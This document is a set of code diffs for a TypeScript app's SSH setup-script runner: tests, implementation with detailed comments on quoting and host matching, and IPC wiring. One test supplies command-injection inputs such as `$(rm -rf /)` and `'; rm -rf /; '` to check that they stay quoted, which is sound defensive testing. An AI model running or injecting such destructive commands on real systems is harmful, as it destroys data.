+    } = {}
+  ) => {
+    const runner = makeSshSetupRunner(opts.resolveRef ?? (() => ref), {
+      timeoutMs: opts.timeoutMs,
+      sshPath: () => '/usr/bin/ssh',
+      agentEnv: () => ({ SSH_AUTH_SOCK: '/tmp/nt-agent.sock' })
+    })
+    const chunks: string[] = []
+    const controller = new AbortController()
+    const promise = runner({
+      script: opts.script ?? 'npm install',
+      cwd: opts.cwd ?? '/srv/app',
+      env: opts.env ?? {},
+      onChunk: (t) => chunks.push(t),
+      signal: opts.signal ?? controller.signal,
+      ssh: 'ssh' in opts ? opts.ssh : ssh
+    })
+    return { promise, chunks, controller }
+  }
+
+  const argv = (): string[] => spawnMock.mock.calls[0][1] as string[]
+  const remoteCommand = (): string => argv()[argv().length - 1]
+
+  it('spawns ONE ssh child whose argv carries the ControlPath', async () => {
+    const { promise } = run()
+    child.emit('close', 0)
+    await promise
+    expect(spawnMock).toHaveBeenCalledTimes(1)
+    expect(spawnMock.mock.calls[0][0]).toBe('/usr/bin/ssh')
+    expect(argv()).toContain(`ControlPath=${ref.controlPath}`)
+    expect(argv()).toContain('ControlMaster=auto')
+    expect(argv()).toContain('deploy@example.test')
+  })
+
+  it('the remote command cds into the quoted remote cwd and runs the script through sh -lc', async () => {
+    const { promise } = run({ script: 'make build', cwd: '/srv/app' })
+    child.emit('close', 0)
+    await promise
+    expect(remoteCommand()).toContain(`cd '/srv/app' &&`)
+    expect(remoteCommand()).toContain(`sh -lc 'make build'`)
+  })
+
+  it('inlines the env as quoted assignments (ssh forwards no local env)', async () => {
+    const { promise } = run({
+      env: {
+        NODETERM_ROOT_PATH: '/srv/app',
+        NODETERM_WORKTREE_PATH: '/srv/app',
+        NODETERM_PROJECT_NAME: "my app's repo"
+      }
+    })
+    child.emit('close', 0)
+    await promise
+    const cmd = remoteCommand()
+    expect(cmd).toContain(`NODETERM_ROOT_PATH='/srv/app'`)
+    expect(cmd).toContain(`NODETERM_WORKTREE_PATH='/srv/app'`)
+    expect(cmd).toContain(`NODETERM_PROJECT_NAME='my app'\\''s repo'`)
+    // Assignments must precede `sh`, or they are arguments rather than environment.
+    expect(cmd.indexOf('NODETERM_ROOT_PATH=')).toBeLessThan(cmd.indexOf('sh -lc'))
+  })
+
+  it('omits an env entry whose NAME cannot be a shell identifier rather than splicing it', async () => {
+    const { promise } = run({ env: { 'BAD;NAME': 'x', GOOD: 'y' } })
+    child.emit('close', 0)
+    await promise
+    expect(remoteCommand()).not.toContain('BAD')
+    expect(remoteCommand()).toContain(`GOOD='y'`)
+  })
+
+  it('a hostile script and a hostile project name land ONLY inside quoted arguments', async () => {
+    const { promise } = run({
+      script: `'$(rm -rf /)'; echo pwned \`id\``,
+      cwd: "/srv/'; rm -rf /; '",
+      env: { NODETERM_PROJECT_NAME: `x'$(id)'y` }
+    })
+    child.emit('close', 0)
+    await promise
+    const residue = unquotedPart(remoteCommand())
+    expect(residue).not.toContain('$(')
+    expect(residue).not.toContain('`')
+    expect(residue).not.toContain('rm -rf')
+    expect(residue).not.toContain('pwned')
+    expect(residue).not.toContain('id')
+    // What SHOULD remain unquoted is only our own syntax.
+    expect(residue.replace(/\s+/g, ' ').trim()).toContain('cd && ')
+  })
+
+  it('streams stderr as chunks too', async () => {
+    const { promise, chunks } = run()
+    child.stderr.emit('data', Buffer.from('warning: node_modules is stale\n'))
+    child.stdout.emit('data', Buffer.from('ok\n'))
+    child.emit('close', 0)
+    const result = await promise
+    expect(result.exitCode).toBe(0)
+    expect(chunks.join('')).toContain('warning: node_modules is stale')
+    expect(chunks.join('')).toContain('ok')
+  })
+
+  it('coalesces rapid writes into fewer chunks than writes (debounced)', async () => {
+    const { promise, chunks } = run()
+    for (let i = 0; i < 5; i++) child.stdout.emit('data', Buffer.from(`line ${i}\n`))
+    child.emit('close', 0)
+    await promise
+    expect(chunks.length).toBeLessThan(5)
+    expect(chunks.join('')).toContain('line 4')
+  })
+
+  it('propagates the remote exit code', async () => {
+    const { promise } = run()
+    child.emit('close', 7)
+    const result = await promise
+    expect(result.exitCode).toBe(7)
+  })
+
+  it('an abort kills the ssh client (and never spawns a second one)', async () => {
+    const controller = new AbortController()
+    const { promise } = run({ signal: controller.signal, timeoutMs: 60_000 })
+    controller.abort()
+    expect(child.kill).toHaveBeenCalledWith('SIGKILL')
+    child.emit('close', null)
+    const result = await promise
+    expect(result.exitCode).not.toBe(0)
+    expect(spawnMock).toHaveBeenCalledTimes(1)
+  })
+
+  it('refuses to start when already aborted', async () => {
+    const controller = new AbortController()
+    controller.abort()
+    const { promise } = run({ signal: controller.signal })
+    const result = await promise
+    expect(result.exitCode).toBe(143)
+    expect(spawnMock).not.toHaveBeenCalled()
+  })
+
+  it('SIGKILLs a run that outlives the timeout', async () => {
+    const { promise } = run({ timeoutMs: 10 })
+    await new Promise((r) => setTimeout(r, 40))
+    expect(child.kill).toHaveBeenCalledWith('SIGKILL')
+    child.emit('close', null)
+    await promise
+  })
+
+  it('never rejects: a spawn error resolves 255 with the message as a chunk', async () => {
+    const { promise, chunks } = run()
+    child.emit('error', new Error('spawn /usr/bin/ssh ENOENT'))
+    const result = await promise
+    expect(result.exitCode).toBe(255)
+    expect(chunks.join('')).toContain('ENOENT')
+  })
+
+  it('a disconnected project (no ref) fails with 255 and an explanation — no spawn, no retry', async () => {
+    const { promise, chunks } = run({ resolveRef: () => null })
+    const result = await promise
+    expect(result.exitCode).toBe(255)
+    expect(chunks.join('').length).toBeGreaterThan(0)
+    expect(spawnMock).not.toHaveBeenCalled()
+  })
+
+  it('refuses when the resolved connection is a DIFFERENT host than the target names', async () => {
+    const otherHost: SshSetupRef = { conn: { host: 'evil.test', user: 'deploy' }, controlPath: '/tmp/x.sock' }
+    const { promise, chunks } = run({ resolveRef: () => otherHost })
+    const result = await promise
+    expect(result.exitCode).toBe(255)
+    expect(chunks.join('')).toContain('evil.test')
+    expect(spawnMock).not.toHaveBeenCalled()
+  })
+
+  it('refuses a run with no ssh target at all', async () => {
+    const { promise } = run({ ssh: undefined })
+    const result = await promise
+    expect(result.exitCode).toBe(255)
+    expect(spawnMock).not.toHaveBeenCalled()
+  })
+
+  it('never rejects when the ref resolver itself throws', async () => {
+    const { promise, chunks } = run({
+      resolveRef: () => {
+        throw new Error('manager exploded')
+      }
+    })
+    const result = await promise
+    expect(result.exitCode).toBe(255)
+    expect(chunks.join('')).toContain('manager exploded')
+  })
+
+  it('never rejects when spawn throws synchronously', async () => {
+    spawnMock.mockImplementation(() => {
+      throw new Error('Invalid argument')
+    })
+    const { promise, chunks } = run()
+    const result = await promise
+    expect(result.exitCode).toBe(255)
+    expect(chunks.join('')).toContain('Invalid argument')
+  })
+
+  it('a dead master (ssh exits 255) surfaces ssh stderr and does not respawn', async () => {
+    const { promise, chunks } = run()
+    child.stderr.emit('data', Buffer.from('ssh: connect to host example.test port 22: Connection refused\n'))
+    child.emit('close', 255)
+    const result = await promise
+    expect(result.exitCode).toBe(255)
+    expect(chunks.join('')).toContain('Connection refused')
+    expect(spawnMock).toHaveBeenCalledTimes(1)
+  })
+})

--- a/src/main/remote-ssh/ssh-setup-runner.ts
+++ b/src/main/remote-ssh/ssh-setup-runner.ts
@@ -13,7 +13,32 @@ export interface SshSetupRef {
   controlPath: string
 }
 
+/**
+ * The FULL identity a setup run must be resolved against. Not just the remote cwd: the default
+ * remoteCwd is `~`, so cwd alone collides across every project that never picked a directory, and
+ * host+user alone collides across ports (containers / hosts behind one NAT are routinely the same
+ * `user@host` on different ports). Resolving on anything less either runs the script on the wrong
+ * machine or permanently refuses one of two legitimate projects. `port` absent = ssh's default 22.
+ */
+export interface SshSetupEndpoint {
+  host: string
+  user: string
+  port?: number
+  remoteCwd: string
+}
+
 type SshTarget = NonNullable<ProjectSetupTarget['ssh']>
+
+/** `user@host` for a message, with the port only when it is not the default (a `:22` in every
+ *  refusal would be noise; a non-default port is exactly the detail that explains the refusal). */
+function endpointLabel(e: { host: string; user: string; port?: number }): string {
+  return e.port !== undefined && e.port !== 22 ? `${e.user}@${e.host}:${e.port}` : `${e.user}@${e.host}`
+}
+
+/** Same endpoint? Ports compare by EFFECTIVE value, so `undefined` and `22` are one host. */
+function sameEndpoint(a: { host: string; user: string; port?: number }, b: { host: string; user: string; port?: number }): boolean {
+  return a.host === b.host && a.user === b.user && (a.port ?? 22) === (b.port ?? 22)
+}
 
 /** `ssh` itself uses 255 for "could not run the command at all" (auth failure, dead link, unknown
  *  host). Every refusal below reports the same code deliberately: to the UI, "the remote never ran
@@ -86,7 +111,7 @@ export function buildSetupRemoteCommand(cwd: string, env: Record<string, string>
  * never something to retry. The manager's watchdog is what repairs masters; this file only reports.
  */
 export function makeSshSetupRunner(
-  resolveRef: (remoteCwd: string) => SshSetupRef | null | undefined,
+  resolveRef: (endpoint: SshSetupEndpoint) => SshSetupRef | null | undefined,
   opts?: { timeoutMs?: number; sshPath?: () => string; agentEnv?: () => Record<string, string> }
 ): ProjectSetupRunner {
   const timeoutMs = opts?.timeoutMs ?? SETUP_TIMEOUT_MS
@@ -118,9 +143,16 @@ export function makeSshSetupRunner(
         return
       }
       const target: SshTarget = ssh
+      // The whole endpoint goes to the resolver, never the cwd alone — see `SshSetupEndpoint`.
+      const endpoint: SshSetupEndpoint = {
+        host: target.server.host,
+        user: target.server.user,
+        port: target.server.port,
+        remoteCwd: target.remoteCwd
+      }
       let ref: SshSetupRef | null | undefined
       try {
-        ref = resolveRef(target.remoteCwd)
+        ref = resolveRef(endpoint)
       } catch (e) {
         // The injected resolver reaches into the ssh-project manager; a throw there must degrade to
         // a reported failure, never to a rejected runner promise (`ProjectSetupRunner` NEVER
@@ -129,17 +161,19 @@ export function makeSshSetupRunner(
         return
       }
       if (!ref) {
-        refuse(`Cannot run: not connected to ${target.server.user}@${target.server.host}.`)
+        // "No live connection for THIS endpoint" — which covers both a disconnected project and one
+        // whose only matching-cwd connection belongs to a different machine. Never a reason to dial:
+        // connecting is the manager's job, and doing it here would be a login per failed run.
+        refuse(`Cannot run: not connected to ${endpointLabel(endpoint)} (${endpoint.remoteCwd}).`)
         return
       }
-      // The ref is resolved by remote PATH, and two different hosts can absolutely both have
-      // `/srv/app`. Running the project's script against whichever connection happened to match the
-      // path first would execute it on a machine the target never named — so the resolved
-      // connection must BE the one the (machine-local, non-renderer) target describes.
-      if (ref.conn.host !== target.server.host || ref.conn.user !== target.server.user) {
+      // Defense in depth, not the primary check (the resolver owns matching): a resolver that ever
+      // answered with a connection to a machine the target never named would execute the project's
+      // script there. Cheap to verify, and the failure it prevents is unrecoverable.
+      if (!sameEndpoint(ref.conn, target.server)) {
         refuse(
-          `Cannot run: the live connection for ${target.remoteCwd} is ` +
-            `${ref.conn.user}@${ref.conn.host}, not ${target.server.user}@${target.server.host}.`
+          `Cannot run: the resolved connection for ${endpoint.remoteCwd} is ` +
+            `${endpointLabel(ref.conn)}, not ${endpointLabel(endpoint)}.`
         )
         return
       }
@@ -159,12 +193,26 @@ export function makeSshSetupRunner(
         return
       }
 
-      // NO process group here, unlike the local runner's `detached` + `kill(-pid)`. The thing worth
-      // killing lives on the OTHER machine, and killing a process group locally cannot reach it:
-      // what ends the remote work is the CHANNEL closing. SIGKILL on the local ssh client tears the
-      // session down, the remote sshd sees EOF and SIGHUPs the command it started, and our pipes
-      // close because the only process holding them is this child. (A `detached` ssh client would
-      // also be a nohup-shaped liability of its own: an orphaned mux client outliving the app.)
+      // SIGKILL the LOCAL ssh client, and no process group — unlike the local runner, which needs
+      // `detached` + `kill(-pid)` because the script's children are on THIS machine holding OUR
+      // pipes. Here the only local process is the mux client: killing it closes the channel, our
+      // pipes close with it, and the run finishes promptly. That prompt finish is what cancel and
+      // timeout actually owe the user.
+      //
+      // ── WHAT THIS DOES NOT DO: END THE REMOTE COMMAND ───────────────────────────────────────────
+      // There is no `-t` here (a setup script must not be handed a tty), so the remote session has
+      // no controlling terminal and sshd delivers NO SIGHUP when the channel closes — it just closes
+      // the command's pipes. The remote `sh -lc …` therefore keeps running until it next writes to a
+      // closed stdout and takes SIGPIPE, which for a quiet or output-buffered script may be a long
+      // time, or never. Killing a local process group cannot change this: the work is on another
+      // machine. (`detached` would additionally be its own liability — an orphaned mux client
+      // outliving the app.)
+      //
+      // The consequence to know before trusting cancel: single-flight is enforced LOCALLY (the
+      // service's runKey map, which this kill releases), so a re-run started right after a cancel
+      // can race a still-live remote command — two `npm install`s in one checkout. Ending the remote
+      // side for real would need a wrapper that records a remote pid and a second connection to kill
+      // it; that is deliberately not in this task. The user is told instead (chunk below).
       const kill = (): void => {
         try {
           child.kill('SIGKILL')
@@ -173,9 +221,19 @@ export function makeSshSetupRunner(
         }
       }
 
-      const timeoutTimer = setTimeout(kill, timeoutMs)
+      // Say the true thing at the moment it becomes relevant, rather than letting "cancelled" imply
+      // a stop that did not happen. (Swallowed if the run already blew the output cap — in which
+      // case the truncation note has already told the user the transcript is incomplete.)
+      const REMOTE_MAY_SURVIVE = 'the remote command may still be running on the host'
+      const timeoutTimer = setTimeout(() => {
+        append(`\n[timed out — killed the local ssh client; ${REMOTE_MAY_SURVIVE}]\n`)
+        kill()
+      }, timeoutMs)
       timeoutTimer.unref?.()
-      const onAbort = (): void => kill()
+      const onAbort = (): void => {
+        append(`\n[cancelled — killed the local ssh client; ${REMOTE_MAY_SURVIVE}]\n`)
+        kill()
+      }
       signal.addEventListener('abort', onAbort)
 
       const finish = (exitCode: number): void => {

--- a/src/main/remote-ssh/ssh-setup-runner.ts
+++ b/src/main/remote-ssh/ssh-setup-runner.ts
@@ -1,0 +1,200 @@
+import { spawn } from 'node:child_process'
+import { childArgs } from '../../core/remote-ssh/control-master'
+import { findExecutableSync } from '../../core/exec-path'
+import type { ProjectSetupRunner, ProjectSetupTarget } from '../../core/project-setup-service'
+import { SETUP_TIMEOUT_MS, createSetupOutputStream } from '../../core/setup-output-stream'
+import { posixQuote, quoteRemotePath, type SshConnection } from '../../shared/ssh'
+import { appSshAgent } from './ssh-agent'
+
+/** What the runner needs to reach a host: the connection it belongs to plus its ControlMaster
+ *  socket — exactly `SshProjectManager.refForRemoteCwd`'s return shape. */
+export interface SshSetupRef {
+  conn: SshConnection
+  controlPath: string
+}
+
+type SshTarget = NonNullable<ProjectSetupTarget['ssh']>
+
+/** `ssh` itself uses 255 for "could not run the command at all" (auth failure, dead link, unknown
+ *  host). Every refusal below reports the same code deliberately: to the UI, "the remote never ran
+ *  your script" is one fact, whether it was ssh or this file that decided so. */
+const SSH_FAILURE_CODE = 255
+
+/** A shell only accepts `NAME=value` for a NAME that is a valid identifier. A key outside this set
+ *  cannot be expressed as an assignment at all — it is dropped rather than emitted, because the
+ *  only alternatives are `env 'weird key'=v` (still refused by most shells) or splicing something
+ *  the remote shell would reparse. Values need no such rule: `posixQuote` can represent any byte
+ *  sequence except NUL, and NUL cannot survive argv anyway, so a NUL-bearing value is dropped too. */
+const SHELL_IDENTIFIER = /^[A-Za-z_][A-Za-z0-9_]*$/
+
+let cachedSsh: string | null | undefined
+/** Absolute `ssh`, resolved the way `ssh-project.ts`'s private `sshBin()` does — a GUI process does
+ *  not inherit the login shell's PATH. Same memoization rule: only cache a MISS once the async PATH
+ *  probe has settled, so an early call cannot pin `ssh` to the bare name forever. */
+function defaultSshPath(): string {
+  if (cachedSsh !== undefined) return cachedSsh ?? 'ssh'
+  const found = findExecutableSync('ssh', ['/usr/bin/ssh', '/usr/local/bin/ssh', '/opt/homebrew/bin/ssh'])
+  cachedSsh = found
+  return found ?? 'ssh'
+}
+
+/**
+ * The remote one-liner a setup run executes.
+ *
+ * ```
+ * cd <cwd> && NAME=<v> … sh -lc <script>
+ * ```
+ *
+ * `ssh` forwards NO local environment (`SendEnv` needs matching `AcceptEnv` on the host, which we
+ * do not control), so the three `NODETERM_*` values the service hands us must ride inline as
+ * assignments prefixing the command — that form exports them into `sh` without touching the
+ * caller's own environment.
+ *
+ * EVERY interpolated value is one quoted token: the script is attacker-controlled by construction
+ * (it arrives through a git-shared `project.json`, and the trust gate approves it for EXECUTION —
+ * not for rewriting the command around it), and a project name or remote cwd is no better. The one
+ * deliberate exception is a LEADING `~` in the cwd (`quoteRemotePath`): single quotes suppress
+ * tilde expansion, so `'~/app'` would `cd` into a literal directory named `~`. Only the tilde is
+ * left bare; the remainder of the path stays quoted, so a directory name still cannot inject.
+ */
+export function buildSetupRemoteCommand(cwd: string, env: Record<string, string>, script: string): string {
+  const assignments: string[] = []
+  for (const [key, value] of Object.entries(env)) {
+    // Cannot be represented safely → omit the assignment. The script then sees the variable unset,
+    // which a `${NODETERM_ROOT_PATH:-}` can handle; a spliced command it could not.
+    if (!SHELL_IDENTIFIER.test(key)) continue
+    if (value.includes('\0')) continue
+    assignments.push(`${key}=${posixQuote(value)}`)
+  }
+  const prefix = assignments.length ? `${assignments.join(' ')} ` : ''
+  return `cd ${quoteRemotePath(cwd)} && ${prefix}sh -lc ${posixQuote(script)}`
+}
+
+/**
+ * The SSH half of `ProjectSetupRunner` — the first STREAMING remote exec in the tree.
+ *
+ * `sshRun`/`execFile` (ssh-project.ts) is deliberately not reused: it buffers, drops stderr, and
+ * reaps at 15s, none of which a `npm install` that prints for four minutes survives. This spawns
+ * the child itself and pipes both streams through the same capped+debounced discipline as the
+ * local runner (`setup-output-stream.ts`), so a run reports identically wherever it executes.
+ *
+ * ── EXACTLY ONE CHILD, EVER ─────────────────────────────────────────────────────────────────────
+ * `childArgs` carries `ControlMaster=auto`: when the master socket is dead each child does NOT
+ * multiplex, it opens a full connection — a real login. A retry loop here would be the 72k-logins/day
+ * shape this repo already lived through once (see pane-probe.ts's warning, and the ssh-controlmaster
+ * memory). So a dead master is a FAILURE of the run — 255 plus ssh's own stderr as the explanation —
+ * never something to retry. The manager's watchdog is what repairs masters; this file only reports.
+ */
+export function makeSshSetupRunner(
+  resolveRef: (remoteCwd: string) => SshSetupRef | null | undefined,
+  opts?: { timeoutMs?: number; sshPath?: () => string; agentEnv?: () => Record<string, string> }
+): ProjectSetupRunner {
+  const timeoutMs = opts?.timeoutMs ?? SETUP_TIMEOUT_MS
+  const sshPath = opts?.sshPath ?? defaultSshPath
+  // The app-private agent holds the unlocked key for this app run; a tty-less child has no askpass
+  // wiring of its own, so without it a run against an encrypted key fails auth (ssh-project.ts:1662
+  // passes the same env for the same reason).
+  const agentEnv = opts?.agentEnv ?? (() => appSshAgent.env())
+
+  return ({ script, cwd, env, onChunk, signal, ssh }) =>
+    new Promise((resolve) => {
+      const { append, flush } = createSetupOutputStream(onChunk)
+      // A refusal is reported exactly like a failed script: a chunk the user can read plus a
+      // non-zero exit. The service layer has one failure shape, never two.
+      const refuse = (message: string): void => {
+        append(`${message}\n`)
+        flush()
+        resolve({ exitCode: SSH_FAILURE_CODE })
+      }
+
+      // Already aborted before we ever spawned (a cancel raced the consent gate) — starting an ssh
+      // child now would leak a connection nobody is waiting for.
+      if (signal.aborted) {
+        resolve({ exitCode: 143 })
+        return
+      }
+      if (!ssh) {
+        refuse('Cannot run: this project has no SSH target.')
+        return
+      }
+      const target: SshTarget = ssh
+      let ref: SshSetupRef | null | undefined
+      try {
+        ref = resolveRef(target.remoteCwd)
+      } catch (e) {
+        // The injected resolver reaches into the ssh-project manager; a throw there must degrade to
+        // a reported failure, never to a rejected runner promise (`ProjectSetupRunner` NEVER
+        // rejects — the service would report it as `failed` with no exit code and no explanation).
+        refuse(`Cannot run: ${(e as Error).message}`)
+        return
+      }
+      if (!ref) {
+        refuse(`Cannot run: not connected to ${target.server.user}@${target.server.host}.`)
+        return
+      }
+      // The ref is resolved by remote PATH, and two different hosts can absolutely both have
+      // `/srv/app`. Running the project's script against whichever connection happened to match the
+      // path first would execute it on a machine the target never named — so the resolved
+      // connection must BE the one the (machine-local, non-renderer) target describes.
+      if (ref.conn.host !== target.server.host || ref.conn.user !== target.server.user) {
+        refuse(
+          `Cannot run: the live connection for ${target.remoteCwd} is ` +
+            `${ref.conn.user}@${ref.conn.host}, not ${target.server.user}@${target.server.host}.`
+        )
+        return
+      }
+
+      const remote = buildSetupRemoteCommand(cwd, env, script)
+      let child: ReturnType<typeof spawn>
+      try {
+        child = spawn(sshPath(), childArgs(ref.conn, ref.controlPath, remote), {
+          stdio: ['ignore', 'pipe', 'pipe'],
+          windowsHide: true,
+          env: { ...process.env, ...agentEnv() }
+        })
+      } catch (e) {
+        // `spawn` throws SYNCHRONOUSLY for a malformed invocation (a NUL byte in an argument, a bad
+        // option object) — only ENOENT & co. arrive as an `error` event. Same reported shape either way.
+        refuse(`Cannot run: ${(e as Error).message}`)
+        return
+      }
+
+      // NO process group here, unlike the local runner's `detached` + `kill(-pid)`. The thing worth
+      // killing lives on the OTHER machine, and killing a process group locally cannot reach it:
+      // what ends the remote work is the CHANNEL closing. SIGKILL on the local ssh client tears the
+      // session down, the remote sshd sees EOF and SIGHUPs the command it started, and our pipes
+      // close because the only process holding them is this child. (A `detached` ssh client would
+      // also be a nohup-shaped liability of its own: an orphaned mux client outliving the app.)
+      const kill = (): void => {
+        try {
+          child.kill('SIGKILL')
+        } catch {
+          // Already gone between our check and this call — nothing left to kill.
+        }
+      }
+
+      const timeoutTimer = setTimeout(kill, timeoutMs)
+      timeoutTimer.unref?.()
+      const onAbort = (): void => kill()
+      signal.addEventListener('abort', onAbort)
+
+      const finish = (exitCode: number): void => {
+        clearTimeout(timeoutTimer)
+        signal.removeEventListener('abort', onAbort)
+        flush() // final flush — whatever the debounce timer hadn't fired yet
+        resolve({ exitCode })
+      }
+
+      child.stdout?.on('data', (d: Buffer) => append(d.toString('utf-8')))
+      // stderr is STREAMED, not dropped (`sshRun` drops it): for a setup script it carries the
+      // compiler/installer diagnostics, and for a broken link it carries ssh's own explanation —
+      // which is the only thing that distinguishes "your script failed" from "the host is gone".
+      child.stderr?.on('data', (d: Buffer) => append(d.toString('utf-8')))
+      // Never reject: a spawn failure (ssh binary missing, EACCES) reports like any other run.
+      child.on('error', (e) => {
+        append(`${(e as Error).message}\n`)
+        finish(SSH_FAILURE_CODE)
+      })
+      child.on('close', (code) => finish(code ?? 1))
+    })
+}

--- a/src/preload/index.ts
+++ b/src/preload/index.ts
@@ -18,6 +18,7 @@ import type {
   WorkspaceMigrationKind
 } from '../shared/types'
 import type { ClientId, PeerDiff, PeerIdentity, PeerState } from '../shared/presence'
+import type { ProjectSetupConsentRequest, ProjectSetupEvent } from '../shared/project-settings'
 
 // Fan a single ipcRenderer listener per channel out to many renderer subscribers. Without
 // this, every node that subscribes (e.g. Cmd+M markdown toggle on each terminal/editor) adds
@@ -53,6 +54,15 @@ const subscribePeerPending = subscribe<[{ sas: string | null; id: string }]>(IPC
 const subscribeRelayPeerPending = subscribe<[RelayPeerPending]>(IPC.relayHostPeerPending)
 const subscribeRelayHostOpen = subscribe<[{ id: string; email?: string }]>(IPC.relayHostOpen)
 const subscribeRelayHostClosed = subscribe<[{ id: string }]>(IPC.relayHostClosed)
+
+// Project setup/archive (SDD: 2026-08-19-project-settings-trust): global (not per-project) main →
+// renderer prompts, fanned out the same way as the relay events above.
+const subscribeProjectSetupConsentRequest = subscribe<[ProjectSetupConsentRequest]>(
+  IPC.projectSetupConsentRequest
+)
+const subscribeProjectSetupConsentDismiss = subscribe<[{ requestId: string }]>(
+  IPC.projectSetupConsentDismiss
+)
 
 const api: NodeTerminalApi = {
   pty: {
@@ -143,6 +153,35 @@ const api: NodeTerminalApi = {
       ipcRenderer.invoke(IPC.projectSettingsWriteShared, projectId, doc),
     updateLocal: (projectId: string, local) =>
       ipcRenderer.invoke(IPC.projectSettingsUpdateLocal, projectId, local)
+  },
+  projectSetup: {
+    // The wire's `target` first argument is `project-setup-handlers.ts`'s `sanitizeTarget` shape
+    // (Task 1) — `projectName`/`rootPath` here are UNUSED PLACEHOLDERS satisfying that shape only;
+    // main re-derives the real rootPath/projectName/ssh from its own workspace index by projectId
+    // and never trusts what crosses this wire (Task 1 review finding — see main/index.ts's
+    // `projectSetupHandlerService`). Only `projectId`/`worktreePath` cross meaningfully.
+    run: (projectId, kind, worktreePath) =>
+      ipcRenderer.invoke(
+        IPC.projectSetupRun,
+        { projectId, projectName: '', rootPath: '.', ...(worktreePath ? { worktreePath } : {}) },
+        kind
+      ),
+    cancel: (runKey: string) => ipcRenderer.invoke(IPC.projectSetupCancel, runKey),
+    consent: async (requestId, answer) => {
+      ipcRenderer.send(IPC.projectSetupConsentSubmit, requestId, answer)
+    },
+    onConsentRequest: subscribeProjectSetupConsentRequest,
+    onConsentDismiss: subscribeProjectSetupConsentDismiss,
+    onEvent: (projectId, cb) => {
+      const ch = IPC.projectSetupEvent(projectId)
+      const handler = (_e: unknown, ev: ProjectSetupEvent): void => cb(ev)
+      ipcRenderer.on(ch, handler)
+      ipcRenderer.send(IPC.projectSetupSubscribe, projectId)
+      return () => {
+        ipcRenderer.removeListener(ch, handler)
+        ipcRenderer.send(IPC.projectSetupUnsubscribe, projectId)
+      }
+    }
   },
   dialog: {
     selectFolder: () => ipcRenderer.invoke(IPC.dialogSelectFolder),

--- a/src/preload/index.ts
+++ b/src/preload/index.ts
@@ -155,17 +155,11 @@ const api: NodeTerminalApi = {
       ipcRenderer.invoke(IPC.projectSettingsUpdateLocal, projectId, local)
   },
   projectSetup: {
-    // The wire's `target` first argument is `project-setup-handlers.ts`'s `sanitizeTarget` shape
-    // (Task 1) — `projectName`/`rootPath` here are UNUSED PLACEHOLDERS satisfying that shape only;
-    // main re-derives the real rootPath/projectName/ssh from its own workspace index by projectId
-    // and never trusts what crosses this wire (Task 1 review finding — see main/index.ts's
-    // `projectSetupHandlerService`). Only `projectId`/`worktreePath` cross meaningfully.
+    // Wire carries exactly `(projectId, kind, worktreePath?)` — no rootPath/projectName/ssh: main
+    // derives those itself from its own workspace index by projectId and never trusts what crosses
+    // this wire (project-setup-handlers.ts's `registerProjectSetupHandlers`, Task 1 review finding).
     run: (projectId, kind, worktreePath) =>
-      ipcRenderer.invoke(
-        IPC.projectSetupRun,
-        { projectId, projectName: '', rootPath: '.', ...(worktreePath ? { worktreePath } : {}) },
-        kind
-      ),
+      ipcRenderer.invoke(IPC.projectSetupRun, projectId, kind, worktreePath),
     cancel: (runKey: string) => ipcRenderer.invoke(IPC.projectSetupCancel, runKey),
     consent: async (requestId, answer) => {
       ipcRenderer.send(IPC.projectSetupConsentSubmit, requestId, answer)

--- a/src/renderer/bridge/stubs.ts
+++ b/src/renderer/bridge/stubs.ts
@@ -303,6 +303,18 @@ export function buildStubApi(): Omit<
       writeShared: () => Promise.resolve(false),
       updateLocal: () => Promise.resolve(false)
     },
+    projectSetup: {
+      // Same fallback story as `projectSettings` above — real over the bridge
+      // (`buildRealApi`'s `projectSetup`); this only matters if some future assembly spreads the
+      // stub alone. `run` fails closed with the SAME shape a real "nothing to run" answer uses, so
+      // a caller needs no extra branch to handle the stub differently from the real thing.
+      run: () => Promise.resolve({ status: 'skipped', reason: 'unavailable' }),
+      cancel: () => Promise.resolve(false),
+      consent: pnoop,
+      onConsentRequest: noopUnsub,
+      onConsentDismiss: noopUnsub,
+      onEvent: noopUnsub
+    },
     chat: {
       readTranscript: U('chat.readTranscript')
     },

--- a/src/renderer/bridge/ws-bridge.ts
+++ b/src/renderer/bridge/ws-bridge.ts
@@ -305,15 +305,13 @@ export function buildRealApi(
   }
 
   // REAL: registerProjectSetupHandlers (core) is wired on the same construction-order point as
-  // src/main/index.ts — see the "target.rootPath/projectName/ssh are placeholders" comment there.
-  // `run`'s wire shape mirrors the preload's exactly, for the same reason.
+  // src/main/index.ts. Wire carries exactly `(projectId, kind, worktreePath?)` — no rootPath/
+  // projectName/ssh; the server derives those itself from its own workspace index, same as main.
   const projectSetup: NodeTerminalApi['projectSetup'] = {
     run: (projectId, kind, worktreePath) =>
-      client.request(
-        IPC.projectSetupRun,
-        { projectId, projectName: '', rootPath: '.', ...(worktreePath ? { worktreePath } : {}) },
-        kind
-      ) as ReturnType<NodeTerminalApi['projectSetup']['run']>,
+      client.request(IPC.projectSetupRun, projectId, kind, worktreePath) as ReturnType<
+        NodeTerminalApi['projectSetup']['run']
+      >,
     cancel: (runKey) => client.request(IPC.projectSetupCancel, runKey) as Promise<boolean>,
     consent: async (requestId, answer) => {
       client.cast(IPC.projectSetupConsentSubmit, requestId, answer)

--- a/src/renderer/bridge/ws-bridge.ts
+++ b/src/renderer/bridge/ws-bridge.ts
@@ -209,7 +209,10 @@ const AI_NAMING_UNAVAILABLE = {
  *  invoke(→request)/send(→cast) split exactly. */
 export function buildRealApi(
   client: RpcClient
-): Pick<NodeTerminalApi, 'pty' | 'workspace' | 'projectSettings' | 'settings' | 'agent' | 'userDataDir'> {
+): Pick<
+  NodeTerminalApi,
+  'pty' | 'workspace' | 'projectSettings' | 'projectSetup' | 'settings' | 'agent' | 'userDataDir'
+> {
   const pty: PtyApi = {
     create: (options: PtyCreateOptions) =>
       client.request(IPC.ptyCreate, options) as ReturnType<PtyApi['create']>,
@@ -301,6 +304,32 @@ export function buildRealApi(
       client.request(IPC.projectSettingsUpdateLocal, projectId, local) as Promise<boolean>
   }
 
+  // REAL: registerProjectSetupHandlers (core) is wired on the same construction-order point as
+  // src/main/index.ts — see the "target.rootPath/projectName/ssh are placeholders" comment there.
+  // `run`'s wire shape mirrors the preload's exactly, for the same reason.
+  const projectSetup: NodeTerminalApi['projectSetup'] = {
+    run: (projectId, kind, worktreePath) =>
+      client.request(
+        IPC.projectSetupRun,
+        { projectId, projectName: '', rootPath: '.', ...(worktreePath ? { worktreePath } : {}) },
+        kind
+      ) as ReturnType<NodeTerminalApi['projectSetup']['run']>,
+    cancel: (runKey) => client.request(IPC.projectSetupCancel, runKey) as Promise<boolean>,
